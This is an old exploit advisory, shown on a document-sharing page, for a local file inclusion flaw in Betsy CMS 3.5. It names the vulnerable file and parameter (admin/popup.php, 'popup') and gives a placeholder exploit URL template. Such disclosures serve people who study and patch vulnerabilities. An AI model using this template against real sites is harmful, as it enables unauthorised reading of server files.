Documents
Resources
Learning Center
Upload
Plans & pricing Sign in
Sign Out

Betsy CMS versions 3.5 Local File Inclusion Vulnerability

VIEWS: 62 PAGES: 1

									                            Betsy CMS versions 3.5 Local File Inclusion Vulnerability   Page 1/1
  1     /*
  2
  3     Author            : MizoZ [from MA]
  4     Group             : EvilWay
  5     Email             : mizozx[at]gmail[dot]com
  6
  7     Greetz            : Zuka !!
  8
  9     Good luck DZ :)
  10
  11    */
  12
  13    The vulnerability is in the file admin/popup.php on the get $_GET[’popup’]
  14
  15    Exploit :
  16
  17    [HOST]/[PATH]/admin/popup.php?popup=[IT INCLUDE FROM admin/]




MizoZ                                                                                   11/21/2009

								
To top